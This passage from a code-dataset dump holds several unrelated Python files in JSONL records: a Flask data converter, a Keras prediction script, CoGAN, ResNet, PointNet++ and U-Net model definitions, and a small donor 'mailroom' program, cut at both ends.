surveys_ids_list = list(json_surveys.keys())\n        #declare arr of dictionaries\n        for survey_id in surveys_ids_list:\n            surveys_arr.append(be_getSurveyData(json_surveys[survey_id]))\n    return surveys_arr\n\n\n\n\n\"\"\"========================================================================\n*** Function: be_convsertJsonGroupData_toArr\n*** server: back end\n*** Description: convert the json group from db to array of groups\n                 all the data under the group will convert to arrays\n*** Arguments: jsonGroup\n*** Return: dict of user group while the data under it convert to array\n=========================================================================\"\"\"\ndef be_convsertJsonGroupData_toArr(json_group, user_data_json):\n    \"\"\" be_convsertJsonGroupData_toArr \"\"\"\n    converted_group = {}\n    if json_group:\n\n        #Assign the entire group from db --> we convert the data below\n        converted_group = json_group\n        converted_group['id'] = str(json_group['id'])\n\n        #Fetch surveys for group\n        group_surveys = []\n        if 'surveys' in json_group:\n            group_surveys = be_convertJsonSurveysData_toArr(json_group['surveys'])\n        converted_group['surveys'] = group_surveys\n\n        #Fetch questions for group\n        group_questions = []\n        if 'questions' in json_group:\n            group_questions = be_convertJsonQuestions_toArr(json_group['questions'])\n        converted_group['questions'] = group_questions\n\n        #Fetch Members\n        group_members = []\n        if 'members' in json_group:\n            current_app.logger.debug('fetch members: {0}'.format(json_group['members']))\n            group_members = be_convertJsonMembers_toArr(json_group['members'])\n        converted_group['members'] = group_members\n\n        #Fetch Admins\n        group_admins = []\n        if 'admins' in json_group:\n            current_app.logger.debug('fetch admins: {0}'.format(json_group['admins']))\n            group_admins = be_convertJsonMembers_toArr(json_group['admins'])\n        converted_group['admins'] = group_admins\n\n        #Fetch chat data\n        group_chat = []\n        if 'chat' in json_group:\n            group_chat = be_convertJsonChat_toArr(json_group['chat'])\n        converted_group['chat'] = group_chat\n\n        #ret_group['creation_data'] = group['creation_date']\n        #ret_group['update_data'] = group['update_date']\n        converted_group['image'] = ''#group['image']\n        if json_group['image'] is True:\n            
converted_group['image'] = '/group/image/get'#get_group_image(group['id'])\n return converted_group\n","sub_path":"be_converter.py","file_name":"be_converter.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"568924357","text":"import argparse\nimport data\nfrom model import *\nimport numpy as np\nimport timeit\nimport time\nimport pandas as pd\nimport os\nfrom keras.models import load_model\nimport json\n\n# A note here: pre-trained embeddings should be incorporated already into the\n# saved model. We don't need to load them again.\n\nparser = argparse.ArgumentParser(description=\"A simple fasttext-style keras model\")\nparser.add_argument(\"--data\", type=str, default=\"./data.csv\",\n help=\"location of the data corpus\")\nparser.add_argument(\"--delimiter\", type=str, default=\",\",\n help=\"the delimiter to use when reading the delimited data\")\nparser.add_argument(\"--quotechar\", type=str, default='\"',\n help=\"the character for quoting text in the delimited data\")\nparser.add_argument(\"--model\", type=str, default=\"model\",\n help=\"file name for model (model.h5 and model.js)\")\nparser.add_argument(\"--out\", type=str, default=\"out.csv\",\n help=\"file name for output csv\")\nparser.add_argument(\"--label_only\", action=\"store_true\", default=False,\n help=\"only output the labels, for something like Kaggle\")\nargs = parser.parse_args()\n\nprocessor_json = json.load(open(args.model+\".json\", \"r\"))\nmodel_h5 = load_model(args.model+\".h5\")\n\n\nprocessor = data.FeatureProcessor()\nprocessor.restore(**processor_json)\n\nX_raw = processor.load_data(args.data)\n\nX = processor.transform(X_raw, verbose=0)\n\npredictions = get_predictions(\n model_h5.predict(X),\n processor_json[\"n_classes\"],\n processor_json[\"max_labels\"],\n processor_json[\"id2class\"],\n label_only=args.label_only)\n\ndf = pd.DataFrame(X_raw[0], columns=[\"x1\"])\nfor col in range(processor_json[\"x_cols\"]-1):\n df = pd.concat([df, pd.DataFrame(X_raw[col], columns=[f\"x{col+1}\"])], axis=1)\n\ndf = pd.concat([df, pd.DataFrame(predictions, columns=[\"predictions\"])], axis=1)\n\ndf.to_csv(args.out, index=False)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109741643","text":"import torch\nimport torch.nn as nn\nclass Generator(nn.Module):\n def __init__(self,img_shape=[3,128,128]):\n super(Generator,self).__init__()\n self.shape =img_shape\n self.init_size =self.shape[1] // 4\n self.fc =nn.Sequential(nn.Linear(100,128 *self.init_size**2 ))\n self.G_0 = nn.Sequential(\n nn.BatchNorm2d(128),\n nn.Upsample(scale_factor=2),\n nn.Conv2d(128,128,3,stride=1,padding=1),\n nn.BatchNorm2d(128,0.8),\n nn.LeakyReLU(0.2,inplace=True),\n nn.Upsample(scale_factor=2)\n )\n self.G_A =nn.Sequential(\n nn.Conv2d(128,64,3,stride=1,padding=1),\n nn.BatchNorm2d(64,0.8),\n nn.LeakyReLU(0.2,inplace=True),\n nn.Conv2d(64,self.shape[0],3,stride=1,padding=1),\n nn.Tanh()\n )\n self.G_B =nn.Sequential(\n nn.Conv2d(128,64,3,stride=1,padding=1),\n nn.BatchNorm2d(64,0.8),\n nn.LeakyReLU(0.2,inplace=True),\n nn.Conv2d(64,self.shape[0],3,stride=1,padding=1),\n nn.Tanh()\n )\n def forward(self,z):\n out =self.fc(z)\n out = out.view(out.shape[0],128,self.init_size,self.init_size)\n tmp =self.G_0(out)\n img_A =self.G_A(tmp)\n img_B =self.G_B(tmp)\n return img_A,img_B\n\nclass 
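One caveat in predict.py above: the concat loop re-reads X_raw[col] under the label x{col+1}, so column x1 is duplicated and the later columns are never attached. A hedged corrected sketch, assuming X_raw is a list of per-column arrays as the loop implies:

import pandas as pd
# build every column in one pass; column j of X_raw becomes "x{j+1}"
df = pd.DataFrame({f"x{j + 1}": X_raw[j] for j in range(processor_json["x_cols"])})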
Discriminator(nn.Module):\n def __init__(self,img_shape=[3,128,128]):\n super(Discriminator,self).__init__()\n def block(in_,out_,normalize=True):\n out =[nn.Conv2d(in_,out_,img_shape[0],2,1)]\n if normalize:\n out.append(nn.BatchNorm2d(out_,0.8))\n out.extend([nn.LeakyReLU(0.2,inplace=True),nn.Dropout2d(0.25)])\n return out\n ds_size = img_shape[1] // 2**4\n self.D_A =nn.Linear(128*ds_size**2,1)\n self.D_B =nn.Linear(128*ds_size**2,1)\n self.D_shared =nn.Sequential(\n *block(3,16,normalize=False),\n *block(16,32),\n *block(32,64),\n *block(64,128)\n )\n def forward(self,img_A,img_B):\n d_A =self.D_shared(img_A)\n d_A =d_A.view(d_A.shape[0],-1)\n valid_A= self.D_A(d_A)\n d_B =self.D_shared(img_B)\n d_B =d_B.view(d_B.shape[0],-1)\n valid_B= self.D_B(d_B)\n return valid_A,valid_B","sub_path":"CoGAN/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599429284","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom layers import *\nfrom resnet import *\n\n\ndef _block_size(in_dim, out_dim, n_blocks, alpha=1.0):\n \"\"\"Returns block_size setting that ensures same memory cost as\n vanilla layer with corresponding in_dim and out_dim\"\"\"\n return int(in_dim * out_dim / (in_dim + out_dim) / n_blocks * alpha)\n\n\ndef _block_size_conv(in_ch, out_ch, filter_h, filter_w, n_blocks, alpha=1.0):\n return _block_size(in_ch * filter_h * filter_w, out_ch, n_blocks, alpha=alpha)\n\n\ndef _block_size_conv3x3(in_ch, out_ch, n_blocks, alpha=1.0):\n return _block_size_conv(in_ch, out_ch, 3, 3, n_blocks, alpha=alpha)\n\n\ndef lrm3x3(in_planes, out_planes, n_blocks, block_size, stride=1, cache_attn=True):\n \"\"\"3x3 low-rank mixture convolution with padding\"\"\"\n return LRMConvV2(in_planes, out_planes, 3, n_blocks, block_size,\n stride=stride, padding=1, cache_attn=cache_attn)\n\n\ndef lrm1x1(in_planes, out_planes, n_blocks, block_size, stride=1, cache_attn=True):\n \"\"\"1x1 low-rank mixture convolution with padding\"\"\"\n return LRMConvV2(in_planes, out_planes, 1, n_blocks, block_size,\n stride=stride, padding=0, cache_attn=cache_attn)\n\n\n# Modified from BasicBlock - https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\nclass LRMBlockV2(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None,\n n_blocks=1, block_size_alpha=1.0, cache_attn=True):\n super(LRMBlockV2, self).__init__()\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n\n # Both self.conv1 and self.downsample layers downsample the input when stride != 1\n\n block_size_conv1 = _block_size_conv3x3(inplanes, planes, n_blocks, alpha=block_size_alpha)\n block_size_conv = _block_size_conv3x3(planes, planes, n_blocks, alpha=block_size_alpha)\n\n self.conv1 = lrm3x3(inplanes, planes, n_blocks, block_size_conv1, stride=stride, cache_attn=cache_attn)\n self.bn1 = norm_layer(planes)\n self.conv2 = lrm3x3(planes, planes, n_blocks, block_size_conv, cache_attn=cache_attn)\n self.bn2 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = 
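A shape smoke test for the coupled generator/discriminator above (illustrative; the default 3x128x128 image shape):

import torch
G, D = Generator(), Discriminator()
z = torch.randn(4, 100)
img_A, img_B = G(z)                  # each (4, 3, 128, 128)
valid_A, valid_B = D(img_A, img_B)   # each (4, 1)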
self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\n# Modified from BasicBlock - https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\nclass HashBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None,\n detach=False, n_keys=256, cache_attn=False, temperature=1.0,\n cut_residual=False):\n super(HashBlock, self).__init__()\n\n ###################################\n self.detach = detach\n self.cut_residual = cut_residual\n ###################################\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n # Both self.conv1 and self.downsample layers downsample the input when stride != 1\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n\n ###################################\n self.hashconv = HashConv(planes, planes, (3, 3), n_keys,\n detach=detach, cache_attn=cache_attn, t=temperature)\n ###################################\n\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n ###################################\n # cut gradient to residual if only training downstream layers\n if self.detach:\n identity = identity.detach()\n ###################################\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.hashconv(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n ###################################\n # cut the residual connection if specified\n if not self.cut_residual:\n out += identity\n ###################################\n\n out = self.relu(out)\n\n return out\n\n\n# Modified from ResNet - https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\nclass LRMResNetV2(nn.Module):\n\n def __init__(self, block, layers, num_classes=100, zero_init_residual=False,\n groups=1, width_per_group=64, replace_stride_with_dilation=None, norm_layer=None,\n n_blocks=1, block_size_alpha=1, route_by='task-dynamic', fit_keys=False):\n super(LRMResNetV2, self).__init__()\n self.task_id = None\n self.route_by = route_by\n self.n_blocks = n_blocks\n self.block_size_alpha = block_size_alpha\n self.param_n_blocks = nn.Parameter(torch.LongTensor([n_blocks]), requires_grad=False)\n self.param_block_size_alpha = nn.Parameter(torch.FloatTensor([block_size_alpha]), requires_grad=False)\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n self._norm_layer = norm_layer\n\n self.inplanes = 64\n self.dilation = 1\n if replace_stride_with_dilation is None:\n # each element in the tuple indicates if we should replace\n # the 2x2 stride with a dilated convolution instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = LRMConvV2(3, self.inplanes, (7, 7), n_blocks,\n _block_size_conv(3, self.inplanes, 7, 7, n_blocks, alpha=block_size_alpha),\n stride=2, padding=3)\n self.bn1 = 
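_block_size above is chosen so that n_blocks factor pairs of rank block_size match the parameter count of a dense in_dim x out_dim layer; a quick numeric check (illustrative values):

in_dim, out_dim, n_blocks = 576, 64, 4
bs = _block_size(in_dim, out_dim, n_blocks)
# n_blocks * bs * (in_dim + out_dim) ~= in_dim * out_dim, up to int() truncation
assert 0 <= in_dim * out_dim - n_blocks * bs * (in_dim + out_dim) < n_blocks * (in_dim + out_dim)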
norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _set_route_by(m):\n if type(m) == LRMConvV2:\n m.route_by = route_by\n\n # set route_by for all LRMConv modules\n self.apply(_set_route_by)\n\n # running statistics\n self.running_entropy = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n self.running_cls_route_div = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n\n # disable grad on LRM block factors if we are only fitting keys\n if fit_keys:\n self.disable_block_grad()\n\n def _make_layer(self, block, planes, blocks, stride=1, dilate=False):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n block_size_downsample = _block_size(self.inplanes, planes * block.expansion, self.n_blocks,\n alpha=self.block_size_alpha)\n downsample = nn.Sequential(\n lrm1x1(self.inplanes, planes * block.expansion, self.n_blocks, block_size_downsample,\n stride=stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer,\n n_blocks=self.n_blocks, block_size_alpha=self.block_size_alpha))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer,\n n_blocks=self.n_blocks, block_size_alpha=self.block_size_alpha))\n\n return nn.Sequential(*layers)\n\n def _forward_impl(self, x):\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n # accumulate LRM stats\n if self.route_by != 'task':\n self.accumulate_entropy()\n if self.task_id is not None:\n self.accumulate_class_routing_divergence()\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n\n return x\n\n def forward(self, x):\n return self._forward_impl(x)\n\n def set_task_id(self, task_id):\n \"\"\"Set task id for the current task. 
Used for routing by task\"\"\"\n self.task_id = task_id\n\n def _set_task_id(m):\n if type(m) == LRMConvV2:\n m.task_id = task_id\n\n # set task_id for all LRMConv modules\n self.apply(_set_task_id)\n\n def restructure_blocks(self, n_blocks, block_size_alpha):\n def restructure_lrm_conv(m):\n if type(m) == LRMConvV2:\n block_size = _block_size_conv(m.in_channels, m.out_channels, *m.kernel_size, n_blocks, block_size_alpha)\n m.restructure_blocks(n_blocks, block_size)\n\n self.apply(restructure_lrm_conv)\n\n def get_sims(self):\n sims = {}\n for n, m in self.named_modules():\n if type(m) == LRMConvV2:\n sims[n] = m.cached_attn\n return sims\n\n def accumulate_entropy(self):\n for n, m in self.named_modules():\n if type(m) == LRMConvV2:\n self.running_entropy[n] += [m.avg_entropy]\n\n def reset_entropy(self):\n self.running_entropy = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n\n def get_entropy(self):\n return self.running_entropy\n\n def accumulate_class_routing_divergence(self, task_id=None):\n if task_id is None:\n task_id = self.task_id\n assert task_id is not None, 'task id is not set'\n for n, m in self.named_modules():\n if type(m) == LRMConvV2 and m.cached_attn is not None:\n sims = m.cached_attn.transpose(1, 3).reshape(-1, self.n_blocks)\n dim1 = sims.shape[0]\n self.running_cls_route_div[n] += [F.cross_entropy(sims, torch.LongTensor([task_id] * dim1)).item()]\n\n def reset_class_routing_divergence(self):\n self.running_cls_route_div = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n\n def get_class_routing_divergence(self):\n return self.running_cls_route_div\n\n def reset_running_stats(self):\n self.reset_entropy()\n self.reset_class_routing_divergence()\n\n def disable_block_grad(self):\n def _disable_block_grad(m):\n if type(m) == LRMConvV2:\n m.disable_block_grad()\n self.apply(_disable_block_grad)\n\n def enable_block_grad(self):\n def _enable_block_grad(m):\n if type(m) == LRMConvV2:\n m.enable_block_grad()\n self.apply(_enable_block_grad)\n\n\ndef _lrm_resnet(Version, block, layers, num_classes=100, seed=1, disable_bn_stats=False, **kwargs):\n torch.manual_seed(seed)\n model = Version(block, layers, **kwargs)\n set_classification_layer(model, num_classes=num_classes)\n\n if disable_bn_stats:\n disable_bn_stats_tracking(model)\n return model\n\n\ndef lrm_resnet18(**kwargs):\n r\"\"\"ResNet-18 model from\n `\"Deep Residual Learning for Image Recognition\" `_\n \"\"\"\n return _lrm_resnet(LRMResNetV2, LRMBlockV2, [2, 2, 2, 2], **kwargs)\n\n\narchs = {\n 'resnet18': resnet18,\n 'lrm_resnet18': lrm_resnet18\n}\n\n\n# test model construction\nif __name__ == '__main__':\n lrm_resnet18()\n resnet18()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223316142","text":"\"\"\" PointNet++ Layers\n\nAuthor: Charles R. 
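A minimal usage sketch for the lrm_resnet18 factory above (hedged: assumes set_classification_layer from resnet wires the head as elsewhere in the file, and a standard 224x224 input):

import torch
model = lrm_resnet18(num_classes=100, n_blocks=4, route_by='task')
model.set_task_id(0)        # select which block the task routing favors
logits = model(torch.randn(2, 3, 224, 224))  # -> (2, 100)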
Qi\nDate: November 2017\n\"\"\"\n\nimport os\nimport sys\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/sampling'))\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/grouping'))\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/3d_interpolation'))\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/geoconv'))\nfrom tf_sampling import farthest_point_sample, gather_point\nfrom tf_grouping import query_ball_point, group_point, knn_point\n\nfrom tf_geoconv import aggregate # 在这里,已经被加入到路径里面了sys.path.append(os.path.join(BASE_DIR, 'tf_ops/geoconv'))\nfrom tf_utils import perceptron, batch_norm_for_fc, batch_norm_for_conv1d\nimport tensorflow as tf\nimport numpy as np\n\n\ndef sample_and_group(npoint, radius, nsample, xyz, points, knn=False, use_xyz=True):\n '''\n Input:\n npoint: int32\n radius: float32\n nsample: int32\n xyz: (batch_size, ndataset, 3) TF tensor\n points: (batch_size, ndataset, channel) TF tensor, if None will just use xyz as points\n knn: bool, if True use kNN instead of radius search\n use_xyz: bool, if True concat XYZ with local point features, otherwise just use point features\n Output:\n new_xyz: (batch_size, npoint, 3) TF tensor\n new_points: (batch_size, npoint, nsample, 3+channel) TF tensor\n idx: (batch_size, npoint, nsample) TF tensor, indices of local points as in ndataset points\n grouped_xyz: (batch_size, npoint, nsample, 3) TF tensor, normalized point XYZs\n (subtracted by seed point XYZ) in local regions\n '''\n\n new_xyz = gather_point(xyz, farthest_point_sample(npoint, xyz)) # (batch_size, npoint, 3)\n if knn:\n _, idx = knn_point(nsample, xyz, new_xyz)\n else:\n idx, pts_cnt = query_ball_point(radius, nsample, xyz, new_xyz)\n grouped_xyz = group_point(xyz, idx) # (batch_size, npoint, nsample, 3)\n grouped_xyz -= tf.tile(tf.expand_dims(new_xyz, 2), [1, 1, nsample, 1]) # translation normalization\n if points is not None:\n grouped_points = group_point(points, idx) # (batch_size, npoint, nsample, channel)\n if use_xyz:\n new_points = tf.concat([grouped_xyz, grouped_points], axis=-1) # (batch_size, npoint, nample, 3+channel)\n else:\n new_points = grouped_points\n else:\n new_points = grouped_xyz\n\n return new_xyz, new_points, idx, grouped_xyz\n\n\ndef sample_and_group_all(xyz, points, use_xyz=True):\n '''\n Inputs:\n xyz: (batch_size, ndataset, 3) TF tensor\n points: (batch_size, ndataset, channel) TF tensor, if None will just use xyz as points\n use_xyz: bool, if True concat XYZ with local point features, otherwise just use point features\n Outputs:\n new_xyz: (batch_size, 1, 3) as (0,0,0)\n new_points: (batch_size, 1, ndataset, 3+channel) TF tensor\n Note:\n Equivalent to sample_and_group with npoint=1, radius=inf, use (0,0,0) as the centroid\n '''\n batch_size = xyz.get_shape()[0].value\n nsample = xyz.get_shape()[1].value\n new_xyz = tf.constant(np.tile(np.array([0, 0, 0]).reshape((1, 1, 3)), (batch_size, 1, 1)),\n dtype=tf.float32) # (batch_size, 1, 3)\n idx = tf.constant(np.tile(np.array(range(nsample)).reshape((1, 1, nsample)), (batch_size, 1, 1)))\n grouped_xyz = tf.reshape(xyz, (batch_size, 1, nsample, 3)) # (batch_size, npoint=1, nsample, 3)\n if points is not None:\n if use_xyz:\n new_points = tf.concat([xyz, points], axis=2) # (batch_size, 16, 259)\n else:\n new_points = points\n new_points = tf.expand_dims(new_points, 1) # (batch_size, 1, 16, 259)\n else:\n new_points = grouped_xyz\n return new_xyz, new_points, idx, grouped_xyz\n\n\ndef geoconv(feat, 
xyz, num_outputs, bypass_num_outputs,\n radius, decay_radius, bn=True, is_training=False,\n scope=None, bn_decay=None, activation_fn=tf.nn.relu,\n delta=False,dropout_self=0, dropout_edge_1=0, dropout_dege_2=0):\n ''' GeoCNN Geo-Conv\n Input:\n feat: (batch_size, num_point, input_channels) TF tensor\n points: (batch_size, num_point, 3) TF tensor\n num_outputs: the count of output channels\n bypass_num_outputs: the count of output channels of bypass\n radius: the inner radius of local ball of each point.\n decay radius: the outer radius of local ball of each point\n ...\n '''\n with tf.variable_scope(scope) as sc:\n feat_self = tf.layers.dropout(feat, rate=dropout_self, training=is_training) # dropout_self\n self = perceptron(feat_self, num_outputs, scope='self', is_training=is_training, bn=False, activation_fn=None)\n feat_edge = tf.layers.dropout(feat, rate=dropout_edge_1, training=is_training) # dropout_edge_1\n mutual = perceptron(feat_edge, bypass_num_outputs * 6, scope='mutual', is_training=is_training, bn=False,\n activation_fn=None)\n # 通过mlp计算出其在六个方向上的特征==》(计算geo特征,从B*N*C==》B*N*6*C,也即每一个点的每一个channel的特征都是分解为六个方向的特征,在aggregate里面会对六个方向的其中三个通过cos平方以及边缘点的计算出的权重进行聚合从何回归到B*N*C)\n ag, _ = aggregate(mutual, xyz, radius, decay_radius, delta)\n b, n, bc = ag.get_shape().as_list()\n _, _, c = self.get_shape().as_list()\n ag = tf.reshape(ag, (-1, bc))\n self = tf.reshape(self, (-1, c))\n\n if bn:\n ag = batch_norm_for_fc(ag, is_training, bn_decay, scope='mutual_bn')\n if activation_fn is not None:\n ag = activation_fn(ag)\n\n ag = tf.reshape(ag, (b, n, bc))\n ag = tf.layers.dropout(ag, rate=dropout_dege_2, training=is_training) # dropout_edge_2\n ag = perceptron(ag, num_outputs, scope='enlarge', is_training=is_training, bn=False, activation_fn=None)\n ag = tf.reshape(ag, (-1, c))\n\n outputs = self + ag\n\n if bn:\n outputs = batch_norm_for_fc(outputs, is_training, bn_decay, scope='enlarge_bn')\n if activation_fn is not None:\n outputs = activation_fn(outputs)\n\n outputs = tf.reshape(outputs, (b, n, c))\n\n return outputs\n\n","sub_path":"models/utils/geo_utils_SE.py","file_name":"geo_utils_SE.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"470218278","text":"donor_db = [(\"William Gates, III\", [653772.32, 12.17]),\n (\"Jeff Bezos\", [877.33]),\n (\"Paul Allen\", [663.23, 43.87, 1.32]),\n (\"Mark Zuckerberg\", [1663.23, 4300.87, 10432.0]),\n (\"Colleen Kaku\", [1000000,1000000,1000000])\n ]\n\ndef send_thank_you():\n while True:\n name=input(\"\\nDonor Full Name (type 'list' for donor list or 'q' to quit): \")\n if name=='q':\n return\n if name!='list':\n break\n list_donors()\n amount = input(\"Donation amount: \")\n if amount=='q':\n return\n if name.title() not in donor_names():\n donor_db.append((name,[]))\n for donor_name,amounts in donor_db:\n if donor_name==name:\n amounts.append(float(amount))\n print()\n print(thank_you_letter(name,float(amount)))\n\ndef donor_names():\n return [name for (name,amounts) in donor_db]\n\ndef list_donors():\n for donor_name,amounts in donor_db:\n print(' '+donor_name)\n\ndef thank_you_letter(name,amount):\n return f\"Dear Mr(s) {name},\\n\" \\\n f\"Thank you very much for your generous donation of ${amount:,.2f}.\\n\" \\\n f\"Sincerely,\\n\" \\\n f\"Python 210 Class of 2018\"\n\ndef create_a_report():\n summary_list = [(name,sum(amounts),len(amounts),sum(amounts)/len(amounts)) for (name,amounts) in donor_db]\n 
summary_list.sort(key=get_second,reverse=True)\n print(\"\\nDONOR NAME TOTAL DONATED NUM DONATIONS AVG DONATION AMT\")\n for (name,total,num,avg) in summary_list:\n print(f\"{name:20s} ${total:12,.2f} {num:3d} ${avg:12,.2f}\")\n\ndef get_second(elem):\n return elem[1]\n\ndef main():\n while True:\n print(\"\\nMAIN MENU\")\n print(\" 1 = Send a Thank You\")\n print(\" 2 = Create a Report\")\n print(\" q = Quit\")\n choice = input(\" ? \")\n if choice=='1':\n send_thank_you()\n continue\n if choice=='2':\n create_a_report()\n continue\n if choice=='q':\n break\n print(\"Invalid choice, try again\")\n continue\n\nif __name__=='__main__':\n main()","sub_path":"students/cocokaku/lesson3/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149129034","text":"import torch\nfrom torch import nn\n\nclass DoubleConv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(DoubleConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, input):\n return self.conv(input)\n\n\nclass Unet_cascade(nn.Module):\n def __init__(self,in_ch,out_ch):\n super(Unet_cascade, self).__init__()\n\n self.conv1 = DoubleConv(in_ch, 64)\n self.pool1 = nn.MaxPool2d(2)\n self.conv2 = DoubleConv(64, 128)\n self.pool2 = nn.MaxPool2d(2)\n self.conv3 = DoubleConv(128, 256)\n self.pool3 = nn.MaxPool2d(2)\n self.conv4 = DoubleConv(256, 512)\n self.pool4 = nn.MaxPool2d(2)\n self.conv5 = DoubleConv(512, 1024)\n self.up6 = nn.ConvTranspose2d(1024, 512, 2, stride=2)\n self.conv6 = DoubleConv(1024, 512)\n self.up7 = nn.ConvTranspose2d(512, 256, 2, stride=2)\n self.conv7 = DoubleConv(512, 256)\n self.up8 = nn.ConvTranspose2d(256, 128, 2, stride=2)\n self.conv8 = DoubleConv(256, 128)\n self.up9 = nn.ConvTranspose2d(128, 64, 2, stride=2)\n self.conv9 = DoubleConv(128, 64)\n self.conv10 = nn.Conv2d(64,out_ch, 1)\n\n self.conv11 = DoubleConv(in_ch, 64)\n self.pool11 = nn.MaxPool2d(2)\n self.conv12 = DoubleConv(64, 128)\n self.pool12 = nn.MaxPool2d(2)\n self.conv13 = DoubleConv(128, 256)\n self.pool13 = nn.MaxPool2d(2)\n self.conv14 = DoubleConv(256, 512)\n self.pool14 = nn.MaxPool2d(2)\n self.conv15 = DoubleConv(512, 1024)\n self.up16 = nn.ConvTranspose2d(1024, 512, 2, stride=2)\n self.conv16 = DoubleConv(1024, 512)\n self.up17 = nn.ConvTranspose2d(512, 256, 2, stride=2)\n self.conv17 = DoubleConv(512, 256)\n self.up18 = nn.ConvTranspose2d(256, 128, 2, stride=2)\n self.conv18 = DoubleConv(256, 128)\n 